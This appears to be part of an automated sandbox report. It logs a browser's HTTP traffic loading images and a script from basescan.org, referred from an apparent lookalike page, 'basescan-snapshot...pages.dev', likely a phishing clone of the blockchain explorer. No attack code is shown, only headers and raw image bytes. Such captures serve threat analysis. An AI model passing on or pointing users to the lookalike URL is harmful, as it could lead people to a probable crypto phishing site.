                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC340INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 31 32 38 22 20 68 65 69 67 68 74 3d 22 31 32 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 32 38 20 31 32 38 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 0a 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 63 6c 69 70 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 38 20 36 34 43 31 32 38 20 39 39 2e 33 34 36 32 20 39 39 2e 32 39 36 31 20 31 32 38 20 36 33 2e 38 38 38 33 20 31 32 38 43 33 30 2e 32 39 35 35 20 31 32 38 20 32 2e 37 33 36 39 37 20 31 30 32 2e 32 30 38 20 30 20 36 39 2e 33 37 39 37 48 38 34 2e 37 34 30 39 56 35 38 2e 36 32 30 32 48 30 43 32 2e 37 33 36 39
                                                                                                                                                                                                                                              Data Ascii: <svg width="128" height="128" viewBox="0 0 128 128" fill="none" xmlns="http://www.w3.org/2000/svg"><path fill-rule="evenodd" clip-rule="evenodd" d="M128 64C128 99.3462 99.2961 128 63.8883 128C30.2955 128 2.73697 102.208 0 69.3797H84.7409V58.6202H0C2.7369


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              46192.168.2.549781104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC650OUTGET /images/main/empty-token.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC848INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:03 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 6167
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: origSize=9650
                                                                                                                                                                                                                                              ETag: "056d290d586d91:0"
                                                                                                                                                                                                                                              Last-Modified: Mon, 15 May 2023 02:33:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 132485
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BjoUkfXcHKBqYLshnjHBK7zfssGGQ346osloFPnpgm0%2BvKyLTAzUgRknQi9iDon1SKuibMYibuWGzZx%2FzDHmhyyITxG2P%2BcehtJ0so4SwahovOTD%2Bz8rarihUyQkug%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2ccec170f81-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC521INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 17 de 49 44 41 54 78 da ec 9d 4b 68 5c 65 14 c7 7d 22 15 a1 2a 3e 10 04 1f 1b c1 17 08 2a 88 e2 63 e1 42 b4 1b 37 8a 2e 14 14 ac 75 a3 74 27 58 ba f2 55 11 04 95 82 0b eb 6b 53 8a 0b ad 42 c9 f9 ee b4 cd f9 ee 24 3a 34 e7 dc 69 d2 96 69 92 3e ac 49 b4 31 4d 9a 47 4b 4d ae 39 43 0c 41 9c 26 99 de 7b e7 ce cc ff 0f 3f 28 6d 92 49 cf f9 ff bf 66 4e bf fb 7d 17 41 cd ad 30 3c be a6 23 94 fb 82 30 7a 81 58 36 39 d6 2d ce eb e7 c4 ba cd 79 dd 4e 5e 76 3a 96 c0 b1 76 39 af 65 62 ed 77 ac 43 e4 65 dc 79 8d 0d fb b5 fd 9e fd 99 7d 8c 7d ac 7d 8e 7d ae 7d 0d e7 e5 4b f2 fa 99 7d 6d 7b 0d 7b 2d 7b 4d 54 1f 82 32 52 47 a9 7f 2d f9 e8 21 62 7d c5 79 fd 68 9e 9f 88
                                                                                                                                                                                                                                              Data Ascii: PNGIHDR\rfIDATxKh\e}"*>*cB7.ut'XUkSB$:4ii>I1MGKM9CA&{?(mIfN}A0<#0zX69-yN^v:v9ebwCey}}}}}K}m{{-{MT2RG-!b}yh
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 0c d5 a5 42 a7 3c 42 5e 76 22 50 cd 8d f5 d0 7a 09 47 43 2b 52 e0 cb 4f 13 6b 27 c2 d3 5a 54 7b ca d1 53 70 38 54 6b b8 77 af f3 ba 1b 61 69 79 76 07 ac 77 c0 f1 50 55 61 d8 7b 2d b1 6c 25 af b3 08 47 9b c0 72 ce f6 12 58 ef 91 80 36 55 1c c7 97 38 af af 93 d7 51 84 a2 3d a9 f6 9e 65 bd 79 01 89 68 23 d9 a1 15 d8 c0 03 16 61 11 f3 04 92 d1 e2 da e5 f5 06 e7 f5 eb 79 e6 60 7c f0 1f e6 88 f5 2b f3 08 92 d2 82 0f e9 90 97 8d f3 8c c3 e8 e0 7c 98 47 6c 8b 37 1e 3a 6a 11 39 1f 3d ea bc 1e 80 b9 c1 2a 39 60 de 41 82 9a 77 c8 77 31 b1 6c c2 0e 3e 50 2f e6 9d 80 e5 1d f3 12 12 d5 74 ef f5 65 17 4c 0c 92 41 76 61 36 d0 24 0a 8a 3d 0f 3b af c3 30 2d 48 98 61 f3 16 12 96 53 6d 8f e3 4b f1 23 3f c8 e2 2d 81 79 0d 89 cb 91 ec 00 49 ec df 07 59 61 5e c3 5b 82 9c 88 b8
                                                                                                                                                                                                                                              Data Ascii: B<B^v"PzGC+ROk'ZT{Sp8TkwaiyvwPUa{-l%GrX6U8Q=eyh#ay`|+|Gl7:j9=*9`Aww1l>P/teLAva6$=;0-HaSmK#?-yIYa^[
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 19 80 00 c1 77 d3 0b d4 d4 40 d2 9b fa 4f ff 28 39 21 d9 66 e0 4f 5d 16 d1 68 ee 52 53 03 49 6f ca c8 7d c5 a7 7f f2 9c 44 eb 6b b6 5a 93 e6 b4 36 00 80 60 31 f4 4c e7 e9 3f 93 5e 2f c5 c9 31 09 d6 d7 de 41 27 0b 03 00 08 16 42 c9 b1 ca 5b 80 38 0b c9 35 03 7f 66 b2 8c a5 7a 83 1a e7 f1 8c 80 0c f6 e4 e9 af af f7 33 a9 80 bf ac 0c 00 20 58 a0 5b 84 bd 0e 18 2d 45 ee 09 89 d5 d7 e6 f6 57 69 4a 53 59 c7 76 6b 9f 5a 1b 48 7a d6 e7 a1 9f 84 a4 9a 80 3f 73 65 10 00 41 1b 03 98 f2 f4 e9 af 7a 8f 84 ea 6a 7c a2 2a e0 2f 6b 03 00 08 16 4b bd 52 3c 7f d3 07 fc 1b 25 99 ba 5a aa 6f 4a 33 66 6d 00 00 c1 e2 69 d4 c7 9f 7f 2b 24 52 1d fc 85 60 00 00 c1 c2 29 59 e6 cc 7f e0 da da 69 4b 23 86 60 00 00 41 4e 09 f2 e7 9f a5 3e ce d7 a5 09 43 31 00 80 20 7f 06 fe 8b 72 b9
                                                                                                                                                                                                                                              Data Ascii: w@O(9!fO]hRSIo}DkZ6`1L?^/1A'B[85fz3 X[-EWiJSYvkZHz?seAzj|*/kKR<%ZoJ3fmi+$R`)YiK#`AN>C1 r
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: 25 2c de b8 e9 06 1a a3 11 ce 96 5b 83 6f 5f 0a aa ec 33 34 c6 2b 1c 1c 39 8f 96 51 24 a7 1a 1e 9d 70 0b 94 07 ef 1a 56 56 57 dd e8 78 33 4a 40 e3 4c 71 b6 f4 f1 96 b5 e0 d4 05 d8 82 53 33 73 6e 76 ee ba eb 1d 18 0e fd 99 a3 7d 0d 77 fe c2 24 13 80 67 4c 5e 99 89 24 05 86 33 c4 59 4e f1 2a f0 16 ac ed 0e 44 c5 3e 41 43 dc 1e cc 4b cb cb 6e cd 39 37 71 69 ca 1d e9 3d 11 fa b3 c7 ec 29 37 3d 73 8d 09 c0 83 12 f0 cb f5 d3 61 cf 01 67 86 b3 c3 19 e2 2c 71 a6 f4 ed 16 22 f6 83 72 75 e0 41 1a e3 76 e2 de 38 00 2c 2d af b8 a1 d1 09 57 0a f9 59 28 d4 9c 1c 39 e7 e6 17 16 98 00 62 62 c3 f6 61 55 7f 70 46 f8 79 7c 8e 33 00 77 20 62 3f 70 ce dd 2d 94 59 a1 41 6e e7 c5 c9 ab 6e 33 e6 16 16 f1 37 7c a4 27 89 f1 89 49 26 80 e8 e8 f8 e9 0b 67 b4 09 38 43 fa f2 56 54 76
                                                                                                                                                                                                                                              Data Ascii: %,[o_34+9Q$pVVWx3J@LqS3snv}w$gL^$3YN*D>ACKn97qi=)7=sag,q"ruAv8,-WY(9bbaUpFy|3w b?p-YAnn37|'I&g8CVTv
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC1369INData Raw: f9 91 1d 13 b1 19 f8 46 a9 a7 f6 28 2e 19 d0 e0 fe 64 c7 73 04 ca 78 67 87 6b 07 2b e6 91 a0 1b 10 da be 48 83 fb 93 1d 2f 28 d0 f6 e4 19 fb d7 fc f3 8f 83 d5 fa e3 34 ba 57 d9 71 b6 fc c8 38 53 7f fe 81 ab 86 34 3c 5b 83 94 f1 ce 04 0f 05 31 c1 95 61 19 94 1d 2f 08 d0 e6 e4 99 fa 5e f9 95 06 a4 b6 82 07 e0 57 76 3c ef 68 52 c6 db 2f 95 29 05 69 a1 a4 ec fb 85 32 2b 3c 08 b6 06 29 e3 dd 7d 22 f6 44 af 79 5f 10 11 9c 11 c8 ab ec b8 7f 50 c6 bb 58 fb fe fc 03 22 22 42 d9 73 3c 0c bf b2 e3 9e 41 19 ef 9c 11 31 87 d8 0b b2 00 a1 ed 53 3c 14 ef b2 e3 79 6a f9 51 c6 db 33 11 73 41 1b b0 20 48 d9 71 b6 fc 58 f8 4b a3 20 68 6f f2 80 32 2f 3b 4e 19 ef 1c 13 31 16 a3 f0 e7 17 58 44 c0 43 f2 af 2d 90 55 4c b2 e5 97 ea b2 0f 16 04 a9 2d c0 96 1f 0b 7f 2c 08 52 76 fc
                                                                                                                                                                                                                                              Data Ascii: F(.dsxgk+H/(4Wq8S4<[1a/^Wv<hR/)i2+<)}"Dy_PX""Bs<A1S<yjQ3sA HqXK ho2/;N1XDC-UL-,Rv
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC170INData Raw: 94 7b ec 3b a5 ae ed 96 da ee c3 72 d3 3c 26 05 fc 3f 6f 2c 66 dd 87 f9 0a 4e de 11 44 cc 41 a5 72 75 e0 41 14 c5 a4 32 4f e3 d1 59 2a 7b 40 60 82 51 d9 1b 29 b4 e3 6e 6c 7c f7 01 a1 cd 6f a5 b6 df 17 aa fe 39 b4 e7 38 70 43 10 5d 86 d4 83 0f 48 2c 40 ad d4 9e 14 ca 7e 47 68 fb 43 f4 cb 11 9c 42 d9 3f 0a 6d ff 21 94 3d 28 b4 e9 13 ca 0c 0b 6d 27 37 3d 9a 4f e2 df e1 bf e1 67 f0 b3 f8 0c 3e 8b df 81 df 85 df 59 d2 b5 af e2 3b f0 5d b4 78 31 f0 5f 17 30 ec be e3 11 a9 c4 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                                                                                                                                              Data Ascii: {;r<&?o,fNDAruA2OY*{@`Q)nl|o98pC]H,@~GhCB?m!=(m'7=Og>Y;]x1_0IENDB`


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              47192.168.2.549780104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC645OUTGET /images/gen/cons_20.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 1090
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: origSize=4098
                                                                                                                                                                                                                                              ETag: "80ff69864fabd91:0"
                                                                                                                                                                                                                                              Last-Modified: Fri, 30 Jun 2023 12:36:43 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58861
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TmHbfK1q8o0sdKXOwwWybbxaNJKUffMw0s2fMM%2BvJAMG4zP8%2FLUE%2BSGTmGG5R%2Bh1MfJcCvHBJR13U7LOnANwHA%2FkeiMT170C%2FeUnlQOistjRJlO0w%2FhEpF9XZMMdFQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cd0f160f6b-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC515INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 03 fc 49 44 41 54 78 da bd 91 5d 68 d5 75 18 c7 3f bf df ff bc ed 6c 6d 6e 6a 9e b3 b3 ed 9c b9 9d e9 54 9a 38 6d c7 95 9e 5c d0 85 1a 09 92 98 51 92 85 cb d7 8b b9 a9 99 ce 19 33 f5 42 aa 8b a2 37 88 b0 9b a2 37 12 2c 08 02 89 02 ad 20 82 de bc 48 53 67 53 74 ee e5 bc fd 5f 9f ce d1 ce 6d d1 45 7d e1 03 cf c5 f3 7c e0 cb c3 7f 92 cd a9 19 1d ef 6f 48 f4 17 9e 9b 17 e1 5f 66 fc 50 db a2 17 56 35 1e ec 5b 5a 5b 45 39 7d f7 c6 5e df bd 3c 26 9f 3c 96 c8 4e ed 6f 7b f3 fa b3 6d 0f f0 37 39 df df 5e 3b 71 68 ce e6 cb fb da 3e 7f 75 4d 93 ec ec ae 97 bd cb ee 5c 09 40 7f ba be 6b 4f ba 7e 64 67 77 54 9e 5c 1c 91 57 1e
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRsRGBIDATx]hu?lmnjT8m\Q3B77, HSgSt_mE}|oH_fPV5[Z[E9}^<&<No{m79^;qh>uM\@kO~dgwT\W
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC575INData Raw: 94 85 53 39 5b 9f 1b cb 0a 59 13 6a 2b 20 15 d7 ac ef 08 b1 6a 6e 88 80 56 38 2e 98 b6 10 ad 36 d8 d0 11 e6 c1 f6 00 0b a2 0a bf 01 37 f3 c2 78 41 b0 3d f7 97 b2 90 8a 80 7a 69 45 ab 1a 79 ba db 60 d7 7d 3e 9e e8 0c d2 d5 10 24 6b 7b 14 1c 01 40 29 98 34 05 43 0b 2b 93 21 7a 53 41 fa 4a bb 5d 7e da 67 a9 93 55 86 79 86 b2 10 b8 b2 61 89 df e8 48 18 54 57 28 2e 5e f3 71 ee 92 a6 30 01 66 5e a1 34 78 02 56 56 31 31 06 3f 5e 34 18 9f 32 88 d4 42 77 52 b3 ad 3b 30 02 78 00 ca 3b 92 00 78 d8 14 79 cf f5 c0 ef 13 72 59 83 73 23 21 4e ff 51 49 4f 22 43 67 4b 06 c7 d2 7c fc 43 2d 37 f2 9a 9e c6 2c f5 b3 4c 0c 03 5c 17 02 3e 72 7e a5 1a 80 9b 3e db 91 b0 28 d6 2a 2d 18 0a 10 a8 b9 c3 61 41 4b 8e 7c 0d 4c 0b b8 d8 b6 06 51 c4 a3 26 cd 7e 8f d6 e9 79 44 81 ed 28 0c
                                                                                                                                                                                                                                              Data Ascii: S9[Yj+ jnV8.67xA=ziEy`}>$k{@)4C+!zSAJ]~gUyaHTW(.^q0f^4xVV11?^42BwR;0x;xyrYs#!NQIO"CgK|C-7,L\>r~>(*-aAK|LQ&~yD(


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              48192.168.2.549782104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC646OUTGET /images/gen/cexio_20.png HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC854INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: image/png
                                                                                                                                                                                                                                              Content-Length: 804
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: imgq:100,h2pri
                                                                                                                                                                                                                                              Cf-Polished: origSize=1121
                                                                                                                                                                                                                                              ETag: "80d0a2f1b97da1:0"
                                                                                                                                                                                                                                              Last-Modified: Thu, 25 Apr 2024 14:16:37 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 58861
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5LxzOgJHvjYXSdOoRHmLbOBT36BqZXh%2F%2Fp94YESH98j3n5k%2BnhHk%2FPGZWkXVRk4P%2F%2FytwgonDAAXnONTe6PLb1ShNbrAEiE4HP1%2FDY10GK%2FfgezJGAgtSoZZodCy1g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2ccfe7d1821-EWR
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC515INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 14 00 00 00 14 08 06 00 00 00 8d 89 1d 0d 00 00 01 71 69 43 43 50 69 63 63 00 00 78 da 95 d1 3b 48 42 51 1c c7 f1 af 5a 14 d1 0b 6a a8 68 b8 83 35 25 44 45 34 86 45 12 24 88 1a 68 35 74 1f be c0 7b 95 7b 95 16 c7 a0 55 68 e8 b1 64 35 b4 34 d7 da d0 1a 04 41 0f 88 e6 86 a6 a2 96 90 db 3d 48 29 81 41 ff e9 c3 ff 9c ff e1 9c df 01 77 25 ab ea 56 cb 38 e8 46 c1 0c 07 fc 52 2c be 22 b5 3d d3 c2 20 dd f4 d2 2d ab 56 3e 18 59 88 d2 b4 3e 6e 71 01 dc f8 c4 59 fc af ba b4 84 a5 82 4b 02 66 d5 bc 59 70 bc 0e 4c 6f 14 f2 c2 bb 40 bf 9a 96 35 c7 a7 c0 98 e9 5c d0 f1 bd e8 2b 35 bf 08 a7 84 71 23 6c 46 c3 73 8e fb 01 29 d5 60 a5 c1 6a da d4 1d 4f 01 5e 4d 37 34 c7 b1 9a 35 e1 92 b0 9e 2d aa d4 ca 05 74 26 8c e5
                                                                                                                                                                                                                                              Data Ascii: PNGIHDRqiCCPiccx;HBQZjh5%DE4E$h5t{{Uhd54A=H)Aw%V8FR,"= -V>Y>nqYKfYpLo@5\+5q#lFs)`jO^M745-t&
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC289INData Raw: 81 bb 21 1b 61 14 6d 21 f0 ce 0b 7e 41 7e 8f 2c 8f 61 e7 11 5b ec 8a 6a 75 c1 cb cc 22 7b 16 61 b8 6c 62 49 32 26 ea f5 59 85 20 98 32 f3 95 ca b4 9e 07 e1 8c b0 07 48 9e 34 99 d9 44 74 0e 10 e6 5a 1c d3 99 17 b4 ce f0 bf bd 2b c3 d9 d5 8b 4d 66 44 d7 ae 4e 0e e9 a1 4d ea 12 de 02 89 d2 8c 33 e3 8d ff b0 8b d0 68 c3 d5 0c b1 79 4b fb 39 d6 d0 10 36 99 b0 c0 7e ac 7c 29 2f 94 5f 2e 4f b0 56 0e 58 53 77 98 3a 8b a2 55 51 2a 8d c3 fe e3 03 d6 44 a3 31 09 fb ad eb f5 a5 3c 70 09 3f 35 81 4d 08 e4 b3 12 36 39 78 c4 1a 12 1f 50 cc 72 65 ff 51 a4 3c d3 8f 02 5c 62 7e b3 bf 47 21 da b1 ca 21 c7 87 5c a5 2a 1b a2 7d f8 3f 56 d9 78 85 5d d3 d7 80 7d 0a 84 8a 20 7d 61 f3 40 41 5b 5f af 06 ac 0c f6 f5 fc e6 d0 02 1e 90 c5 09 b0 de 7f 73 e0 81 c0 92 20 7a 1c bc 7d f9
                                                                                                                                                                                                                                              Data Ascii: !am!~A~,a[ju"{albI2&Y 2H4DtZ+MfDNM3hyK96~|)/_.OVXSw:UQ*D1<p?5M69xPreQ<\b~G!!\*}?Vx]} }a@A[_s z}


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              49192.168.2.549783104.26.13.1134435896C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-09-28 01:16:03 UTC577OUTGET /jss/ace/ace.js HTTP/1.1
                                                                                                                                                                                                                                              Host: basescan.org
                                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                                              Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                              Sec-Fetch-Dest: script
                                                                                                                                                                                                                                              Referer: https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                              2024-09-28 01:16:04 UTC873INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 28 Sep 2024 01:16:04 GMT
                                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Cache-Control: max-age=1209600
                                                                                                                                                                                                                                              Cf-Bgj: minify
                                                                                                                                                                                                                                              Cf-Polished: origSize=354531
                                                                                                                                                                                                                                              ETag: "0d2ce75dabd41:0"
                                                                                                                                                                                                                                              Last-Modified: Sun, 13 Jan 2019 06:59:00 GMT
                                                                                                                                                                                                                                              Referrer-Policy: origin-when-cross-origin
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                              Age: 635192
                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sAHh%2F55PiDC9wTG%2FZ%2BmUNhvd5oPOeA4%2FeQ9o1W%2BOYPxeanB%2F9%2FQHv1sBnaNNtXdpBGlbgPhqh7L%2BdFbaxYByjXgvprMb%2BQQ%2Bv7NNVjlY6KF9h8oz6ksDZrwobFdx8A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                              CF-RAY: 8c9fe2cd1dd72361-EWR
